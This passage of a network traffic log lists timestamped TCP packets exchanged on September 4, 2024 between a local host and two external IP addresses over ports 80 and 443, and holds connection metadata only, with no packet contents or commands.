Sep 4, 2024 17:37:08.834086895 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.834094048 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.834110975 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.834131956 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.835874081 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.835922956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.835922956 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.835938931 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.835963964 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.835973978 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.835975885 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.835987091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.835995913 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836009026 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.836014986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836025000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836033106 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836035013 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.836059093 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.836066961 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.836121082 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836131096 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836138964 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836159945 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.836173058 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.836230993 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836246014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836255074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836262941 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836275101 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.836283922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.836308002 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.836328983 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.836345911 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.836388111 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836388111 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.836394072 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.836400032 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836407900 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836410999 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.836411953 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836421967 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836431980 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836441994 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836443901 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.836443901 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.836457968 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.836477995 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.836560011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836570024 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836579084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836596966 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.836617947 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.836818933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836828947 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836838007 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836847067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836855888 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.836855888 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.836879015 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.836905003 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.837116957 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.837130070 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.837169886 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.837176085 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.837199926 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.837218046 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.837435007 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837444067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837451935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837460995 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837476015 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837481022 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837486029 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837490082 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.837491035 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837502003 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837511063 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837519884 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.837522030 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837532043 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837538958 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.837546110 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837546110 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.837572098 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.837594032 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.837610006 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.837624073 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.837666035 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.837672949 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.837706089 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.837832928 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837842941 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837896109 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.837896109 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.837912083 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837923050 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837930918 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837940931 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837949038 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837953091 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.837960958 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.837964058 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837974072 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837981939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837990999 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.837992907 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.838001013 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838001013 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.838011026 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838021040 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.838046074 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.838264942 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838275909 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838284016 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838293076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838301897 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838310003 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838310957 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.838320017 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838326931 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.838330030 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838340998 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838347912 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.838347912 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.838350058 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838360071 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838378906 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.838398933 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.838546991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838557005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838567019 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838576078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838586092 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838593006 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.838596106 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838615894 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.838628054 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.838834047 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838845015 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838854074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838862896 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838871956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838881016 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.838881969 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838891983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838897943 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.838901043 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.838912010 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.838922977 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.838963985 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.839015961 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839027882 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839036942 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839041948 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.839051008 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839056015 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839056015 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.839060068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839061975 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839071989 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839076996 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.839082956 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.839083910 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.839091063 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.839102030 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.839128017 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.839128971 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.839385986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839400053 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839409113 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839413881 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.839418888 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839427948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839428902 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.839438915 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839448929 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839462996 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839463949 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.839463949 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.839483023 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839483976 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.839493990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839503050 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839508057 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.839513063 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839514971 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.839524031 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839534044 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839536905 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.839545965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839554071 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839560986 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.839567900 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.839593887 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.839765072 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839782953 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839793921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839802027 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.839802027 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.839822054 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.839850903 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.844407082 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.844423056 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.844466925 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.844475031 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.844515085 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.845866919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.845880032 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.845889091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.845921040 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.845947027 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.845999002 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.846010923 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.846024990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.846039057 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.846043110 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.846052885 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.846072912 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.870456934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.870498896 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.870513916 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.870538950 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.870580912 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.870727062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.870747089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.870759964 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.870770931 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.870770931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.870798111 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.870803118 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.870814085 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.870816946 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.870825052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.870836020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.870846987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.870846987 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.870872974 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.870889902 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.870940924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.870950937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.870968103 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.870985031 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.870997906 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.871006012 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.871885061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.871931076 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.871937037 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.871948957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.871974945 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.871988058 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.872050047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.872061014 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.872071981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.872081995 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.872082949 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.872103930 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.872133017 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.872190952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.872201920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.872216940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.872227907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.872227907 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.872239113 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.872241020 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.872251034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.872262001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.872262955 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.872287989 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.872299910 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.885345936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.885382891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.885394096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.885402918 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.885416985 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.885416985 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.885433912 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.885504007 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.885514021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.885521889 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.885531902 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.885543108 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.885566950 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.885627031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.885637045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.885644913 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.885653973 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.885664940 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.885675907 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.885703087 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.885757923 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.885768890 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.885793924 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.885803938 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.888504028 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.888514996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.888531923 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.888542891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.888562918 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.888596058 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.888664961 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.888674974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.888684034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.888695002 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.888699055 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.888705015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.888714075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.888719082 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.888726950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.888736963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.888741970 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.888747931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.888747931 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.888770103 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.888775110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.888783932 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.888793945 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.888817072 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.889228106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.889271021 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.889283895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.889293909 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.889334917 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.889998913 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890010118 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890017986 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890027046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890036106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890037060 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890058994 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890110970 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890196085 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890208006 CEST	80	49719	147.45.44.104	192.168.2.6
